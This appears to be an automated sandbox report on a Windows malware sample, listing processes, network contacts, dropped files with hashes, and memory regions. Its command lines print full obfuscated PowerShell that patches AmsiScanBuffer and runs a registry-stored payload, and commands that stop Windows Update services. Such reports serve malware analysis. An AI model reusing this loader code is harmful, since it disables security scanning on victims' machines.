C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rWNoSHwYnwkI{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$qNbyexdlHPgKWO,[Parameter(Position=1)][Type]$pGJLtrOUxb)$PTQAtKeJiqS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+'l'+[Char](101)+''+'c'+''+'t'+'e'+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+'e'+'m'+''+[Char](111)+'r'+'y'+'M'+'o'+''+'d'+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+'e'+'g'+'ate'+'T'+'y'+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+'s'+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+','+[Char](83)+''+'e'+'a'+[Char](108)+''+'e'+''+'d'+''+[Char](44)+'An'+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+''+[Char](44)+'A'+[Char](117)+''+[Char](116)+'o'+[Char](67)+'l'+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$PTQAtKeJiqS.DefineConstructor(''+[Char](82)+'T'+[Char](83)+'p'+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+'a'+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$qNbyexdlHPgKWO).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+'i'+''+'m'+'e'+[Char](44)+''+'M'+''+[Char](97)+'na'+'g'+''+[Char](101)+'d');$PTQAtKeJiqS.DefineMethod('I'+'n'+''+[Char](118)+''+[Char](111)+'k'+'e'+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'H'+'i'+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'N'+'e'+''+'w'+''+[Char](83)+'l'+[Char](111)+''+[Char](116)+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$pGJLtrOUxb,$qNbyexdlHPgKWO).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+'e'+[Char](100)+'');Write-Output $PTQAtKeJiqS.CreateType();}$uCYewRMsqHnJv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')}).GetType('M'+'i'+''+'c'+'ro'+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+'2.Un'+'s'+'a'+[Char](102)+''+'e'+''+'N'+'a'+[Char](116)+'iv'+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'od'+'s'+'');$IRRkTkPWrSBpRK=$uCYewRMsqHnJv.GetMethod(''+[Char](71)+'etP'+[Char](114)+''+[Char](111)+''+'c'+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'ub'+[Char](108)+'ic'+','+''+'S'+''+[Char](116)+''+'a'+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jPtdBsPkTWyCVjbdkiF=rWNoSHwYnwkI @([String])([IntPtr]);$ttwoMDhqFKncjBHCysbhgm=rWNoSHwYnwkI @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$joJWgnTTDmi=$uCYewRMsqHnJv.GetMethod(''+[Char](71)+''+'e'+''+'t'+'M'+[Char](111)+''+[Char](100)+'u'+'l'+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+'.'+'d'+''+[Char](108)+''+[Char](108)+'')));$gaQMctFYLwqKhG=$IRRkTkPWrSBpRK.Invoke($Null,@([Object]$joJWgnTTDmi,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'d'+[Char](76)+''+[Char](105)+'br'+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$qxJzCAuMKBcmkjfBg=$IRRkTkPWrSBpRK.Invoke($Null,@([Object]$joJWgnTTDmi,[Object]('Vi'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'P'+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+'t')));$ElhYZqC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gaQMctFYLwqKhG,$jPtdBsPkTWyCVjbdkiF).Invoke(''+'a'+'m'+[Char](115)+''+[Char](105)+'.dl'+[Char](108)+'');$BdgjQiKwxREMtcYjP=$IRRkTkPWrSBpRK.Invoke($Null,@([Object]$ElhYZqC,[Object](''+'A'+'ms'+'i'+''+'S'+'c'+[Char](97)+''+[Char](110)+''+'B'+'u'+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$RBsNwuxrLP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qxJzCAuMKBcmkjfBg,$ttwoMDhqFKncjBHCysbhgm).Invoke($BdgjQiKwxREMtcYjP,[uint32]8,4,[ref]$RBsNwuxrLP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BdgjQiKwxREMtcYjP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qxJzCAuMKBcmkjfBg,$ttwoMDhqFKncjBHCysbhgm).Invoke($BdgjQiKwxREMtcYjP,[uint32]8,0x20,[ref]$RBsNwuxrLP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'e'+'rs'+[Char](116)+'ag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe

C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OGmlLWAVqpge{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TsNhdFnLxjfEog,[Parameter(Position=1)][Type]$jyDNPwBZvD)$oNgAvRiMVzR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+'l'+[Char](101)+''+'c'+'t'+'e'+''+'d'+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+'M'+'e'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+'t'+[Char](101)+'T'+'y'+''+[Char](112)+''+[Char](101)+'','Cl'+[Char](97)+''+'s'+'s'+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+'e'+''+'a'+'le'+[Char](100)+''+','+'A'+'n'+'s'+[Char](105)+'C'+'l'+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$oNgAvRiMVzR.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+'e'+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+'S'+[Char](105)+''+'g'+''+','+''+'P'+'u'+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$TsNhdFnLxjfEog).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+'g'+'e'+'d');$oNgAvRiMVzR.DefineMethod('I'+'n'+''+'v'+'ok'+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+'g'+[Char](44)+'N'+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+'o'+''+'t'+','+[Char](86)+'ir'+'t'+'u'+[Char](97)+''+[Char](108)+'',$jyDNPwBZvD,$TsNhdFnLxjfEog).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $oNgAvRiMVzR.CreateType();}$gfxDMLZvsoWkp=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+'l')}).GetType(''+'M'+'i'+[Char](99)+''+[Char](114)+''+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+'W'+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+'t'+''+[Char](105)+''+[Char](118)+'e'+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+''+[Char](100)+'s');$aUnKfREvwPIzwM=$gfxDMLZvsoWkp.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+'es'+'s'+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HFxtNqoXAbLcrxCPVFX=OGmlLWAVqpge @([String])([IntPtr]);$qtIpSTWHCzQzpOeBuGGPuN=OGmlLWAVqpge @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$fLxLQMkrzuH=$gfxDMLZvsoWkp.GetMethod(''+[Char](71)+''+'e'+'tMo'+[Char](100)+'u'+[Char](108)+''+'e'+'H'+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+''+'e'+''+'l'+''+[Char](51)+''+[Char](50)+'.'+[Char](100)+'ll')));$EmGnHNgYXIcANx=$aUnKfREvwPIzwM.Invoke($Null,@([Object]$fLxLQMkrzuH,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+'A'+'')));$wdEPlweooazpnKfOR=$aUnKfREvwPIzwM.Invoke($Null,@([Object]$fLxLQMkrzuH,[Object](''+'V'+''+[Char](105)+''+[Char](114)+'t'+'u'+''+[Char](97)+'l'+'P'+''+'r'+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+'t')));$ttOjfWX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EmGnHNgYXIcANx,$HFxtNqoXAbLcrxCPVFX).Invoke('a'+'m'+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$cvXVWYJuPXJOoVoRH=$aUnKfREvwPIzwM.Invoke($Null,@([Object]$ttOjfWX,[Object]('Am'+[Char](115)+''+[Char](105)+'S'+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+'f'+'e'+''+'r'+'')));$FcgrhMHjCI=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wdEPlweooazpnKfOR,$qtIpSTWHCzQzpOeBuGGPuN).Invoke($cvXVWYJuPXJOoVoRH,[uint32]8,4,[ref]$FcgrhMHjCI);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$cvXVWYJuPXJOoVoRH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wdEPlweooazpnKfOR,$qtIpSTWHCzQzpOeBuGGPuN).Invoke($cvXVWYJuPXJOoVoRH,[uint32]8,0x20,[ref]$FcgrhMHjCI);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+'WAR'+[Char](69)+'').GetValue('di'+[Char](97)+'l'+[Char](101)+''+[Char](114)+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{09f4a227-cef4-4b5d-ba7b-580721731d4e}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{c3f2fd93-4d00-463c-bd0a-7536c6c18483}

C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Users\Admin\AppData\Roaming\CompPkg.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 appengine.google.com udp
US 174.61.118.194:4872 tcp
DE 195.201.57.90:443 ipwho.is tcp
US 73.179.34.234:4872 tcp
US 174.61.118.194:4872 tcp

Files

C:\Windows\systemprocess.exe

MD5 b5e966fbfca567c51d5da8b2106a48e5
SHA1 164ace9df43f1a760c1205f82c9cc4eb1dfee991
SHA256 30e97b3c23a562d5ea0b8605ded5a5b22529defc42c1a420dfbb3e42007910c8
SHA512 9169eaab184c2412dc469cee331efca0b17ed4efa8ec791d1c3320b7914a2132dba76dccf7700cbe1084c2ab00e3e4bec277564bdb0a9f2e9739e559109bc534

memory/5768-14-0x00007FF973103000-0x00007FF973105000-memory.dmp

C:\Windows\host.exe

MD5 1cf0ec247776f6817231070a2f75994c
SHA1 3253eccccece8243d11975e7021569251def8f2f
SHA256 e867dd037f2f1d8a36c6a0d3972ddd027f9536838e92d6aa911a60f47cf2f051
SHA512 f2c011d2dcb2eb5efea73c89fdd5c99534f5956485a982329de39361db2cda92ccbed4d38860b767c2149b78e8ba7ed8117793955e60a773bc8c05937112be90

memory/5768-29-0x0000018E2D8D0000-0x0000018E2DA62000-memory.dmp

C:\Windows\CompPkg.exe

MD5 39ba631f3e54a2c480e7c83e5e6d14ff
SHA1 82f3e3f1faf9d879a37e473a81cb5d32672af099
SHA256 3dd90786fa7eb27ec458cd54b83801027490cb39f6f570f4779ab63b54504d64
SHA512 0c5bb9e46a54343aa0c3a46367ff9216472598d1cfd854003da5e782e8be485622cfce6a1912d54c4dce348d4824b3009ecde4ecf5be0d89baa500fb63ff9c16

memory/3076-32-0x0000000000F10000-0x0000000000F7A000-memory.dmp

memory/5768-33-0x0000018E2DF30000-0x0000018E2DF4C000-memory.dmp

memory/2660-34-0x0000000004E70000-0x0000000004EA6000-memory.dmp

memory/2660-36-0x0000000005660000-0x0000000005C8A000-memory.dmp

memory/5768-35-0x00007FF973100000-0x00007FF973BC2000-memory.dmp

memory/2660-37-0x0000000005370000-0x0000000005392000-memory.dmp

memory/1444-38-0x0000000004FD0000-0x0000000005036000-memory.dmp

memory/1444-39-0x00000000050B0000-0x0000000005116000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iad1besm.ot2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1444-48-0x0000000005770000-0x0000000005AC7000-memory.dmp

memory/1444-57-0x0000000005BF0000-0x0000000005C0E000-memory.dmp

memory/1444-58-0x0000000005F50000-0x0000000005F9C000-memory.dmp

memory/5768-64-0x0000018E48050000-0x0000018E480A0000-memory.dmp

memory/5768-63-0x0000018E47FC0000-0x0000018E47FFA000-memory.dmp

memory/5768-66-0x0000018E48000000-0x0000018E4804E000-memory.dmp

memory/5768-65-0x0000018E48560000-0x0000018E48612000-memory.dmp

memory/5768-67-0x0000018E484A0000-0x0000018E484EC000-memory.dmp

memory/5768-62-0x0000018E2F7B0000-0x0000018E2F7C2000-memory.dmp

memory/5768-69-0x0000018E48620000-0x0000018E4864A000-memory.dmp

memory/5768-68-0x0000018E484F0000-0x0000018E4853A000-memory.dmp

memory/2660-70-0x0000000007960000-0x0000000007FDA000-memory.dmp

memory/2660-71-0x00000000067D0000-0x00000000067EA000-memory.dmp

memory/1444-73-0x0000000070E90000-0x0000000070EDC000-memory.dmp

memory/1444-72-0x00000000061A0000-0x00000000061D4000-memory.dmp

memory/1444-82-0x0000000006230000-0x000000000624E000-memory.dmp

memory/1444-83-0x0000000006BF0000-0x0000000006C94000-memory.dmp

memory/2660-86-0x0000000008590000-0x0000000008B36000-memory.dmp

memory/2660-88-0x0000000007510000-0x00000000075A2000-memory.dmp

memory/1444-89-0x0000000006FC0000-0x0000000006FCA000-memory.dmp

memory/1444-90-0x00000000071E0000-0x0000000007276000-memory.dmp

memory/5768-91-0x0000018E487C0000-0x0000018E487D2000-memory.dmp

memory/5768-92-0x0000018E48820000-0x0000018E4885C000-memory.dmp

memory/1444-93-0x0000000007150000-0x0000000007161000-memory.dmp

memory/1444-94-0x0000000007190000-0x000000000719E000-memory.dmp

memory/1444-95-0x00000000071A0000-0x00000000071B5000-memory.dmp

memory/1444-96-0x00000000072A0000-0x00000000072BA000-memory.dmp

memory/1444-97-0x0000000007280000-0x0000000007288000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 86c4045b8d294c8282009af508fff707
SHA1 56932ef154b5ed1046300446bacf50a8d44c147b
SHA256 2890b9aa2b9b856fe1b3de029e8bb42d28f961ee99c1362b5c31a91ec3fee059
SHA512 f1bf59232a6ab749ace9245a89029f0e064f132c9515477c0213c6f942341d2b5493cd0adbaa3a401b87078aec3dd9f1f5eed9ad393672e555c02e539a079648

memory/5768-102-0x0000018E48800000-0x0000018E48812000-memory.dmp

memory/5768-103-0x00007FF973103000-0x00007FF973105000-memory.dmp

memory/5664-112-0x000001F577350000-0x000001F577372000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 86acdf583fc319a406c3f74a61d663fa
SHA1 604996c51c6aec2620a45decd4e59764e708c08f
SHA256 3a88e39b770621c79be35fbf685baf5e3cc9ce16fcf91bc67ac06247d081278c
SHA512 f3e990090e66e4fe13659827b9405dc312abf81e6432da18ae11d0fa4b0ed5399bb4d9dc597459b5d5bdf333efdac702db4d78305ae9c0768f37229a27c17368

memory/5664-115-0x000001F5773C0000-0x000001F57750F000-memory.dmp

memory/5768-116-0x00007FF973100000-0x00007FF973BC2000-memory.dmp

memory/848-117-0x0000000140000000-0x000000014002B000-memory.dmp

memory/848-122-0x0000000140000000-0x000000014002B000-memory.dmp

memory/848-120-0x0000000140000000-0x000000014002B000-memory.dmp

memory/848-118-0x0000000140000000-0x000000014002B000-memory.dmp

memory/848-119-0x0000000140000000-0x000000014002B000-memory.dmp

memory/5268-143-0x0000000140000000-0x000000014000D000-memory.dmp

memory/5268-149-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2336-154-0x0000000140000000-0x0000000140835000-memory.dmp

memory/2336-155-0x0000026F5B100000-0x0000026F5B120000-memory.dmp

memory/2336-160-0x0000000140000000-0x0000000140835000-memory.dmp

memory/2336-159-0x0000000140000000-0x0000000140835000-memory.dmp

memory/2336-158-0x0000000140000000-0x0000000140835000-memory.dmp

memory/2336-157-0x0000000140000000-0x0000000140835000-memory.dmp

memory/2336-156-0x0000000140000000-0x0000000140835000-memory.dmp

memory/2336-153-0x0000000140000000-0x0000000140835000-memory.dmp

memory/2336-152-0x0000000140000000-0x0000000140835000-memory.dmp

memory/2336-151-0x0000000140000000-0x0000000140835000-memory.dmp

memory/2336-148-0x0000000140000000-0x0000000140835000-memory.dmp

memory/2336-150-0x0000000140000000-0x0000000140835000-memory.dmp

memory/5268-142-0x0000000140000000-0x000000014000D000-memory.dmp

memory/5268-141-0x0000000140000000-0x000000014000D000-memory.dmp

memory/5268-140-0x0000000140000000-0x000000014000D000-memory.dmp

memory/5268-139-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2336-147-0x0000000140000000-0x0000000140835000-memory.dmp

memory/5316-169-0x00000154C6B90000-0x00000154C6BBA000-memory.dmp

memory/5316-170-0x00007FF994120000-0x00007FF994329000-memory.dmp

memory/5316-171-0x00007FF9930F0000-0x00007FF9931AD000-memory.dmp

memory/4636-172-0x0000000140000000-0x0000000140008000-memory.dmp

memory/4636-177-0x0000000140000000-0x0000000140008000-memory.dmp

memory/4636-175-0x0000000140000000-0x0000000140008000-memory.dmp

memory/4636-174-0x0000000140000000-0x0000000140008000-memory.dmp

memory/4636-173-0x0000000140000000-0x0000000140008000-memory.dmp

memory/908-179-0x00007FF994120000-0x00007FF994329000-memory.dmp

memory/908-180-0x00007FF9930F0000-0x00007FF9931AD000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bb7d9cd87343b2c81c21c7b27e6ab694
SHA1 27475110d09f1fc948f1d5ecf3e41aba752401fd
SHA256 b06963546e5a36237a9061b369789ebdfc6578c4adfbb3ad425a623ffd2518df
SHA512 bf6e222412df3e8fb28fbdd2247628b85ed5087d7be94fa77577a45d02c5f929f20d572867616f1761c86a81e0769d63be5a4e737975c7e7ebc2ef9dccae9a0b

memory/4636-191-0x00007FF994120000-0x00007FF994329000-memory.dmp

memory/4396-190-0x00007FF9930F0000-0x00007FF9931AD000-memory.dmp

memory/4396-189-0x00007FF994120000-0x00007FF994329000-memory.dmp

memory/4636-192-0x00007FF9930F0000-0x00007FF9931AD000-memory.dmp

memory/632-198-0x000002191D650000-0x000002191D67B000-memory.dmp

memory/632-197-0x000002191D650000-0x000002191D67B000-memory.dmp

memory/632-196-0x000002191D3D0000-0x000002191D3F5000-memory.dmp

memory/4396-193-0x0000000140000000-0x0000000140008000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CompPkg.exe.log

MD5 4a01567f513143419390cb40e6abaf71
SHA1 d0d714d6e526a652fc4e5de4e6040d6b0e7687ab
SHA256 6efaeb6a1b391155453a57c7e437575bb18efc174f3099d984d9dea49eecebad
SHA512 379fcb42d0f72d302482fadd4f25cbfa9c5f6a9c50222877d0eed91f237ec688eb52f65ee0d3fccfd017a6b14bd36f34fa0b77a388728fe3942a981322d7a4bc

memory/5608-899-0x0000000000820000-0x000000000088A000-memory.dmp

memory/5208-922-0x0000000000180000-0x00000000001EA000-memory.dmp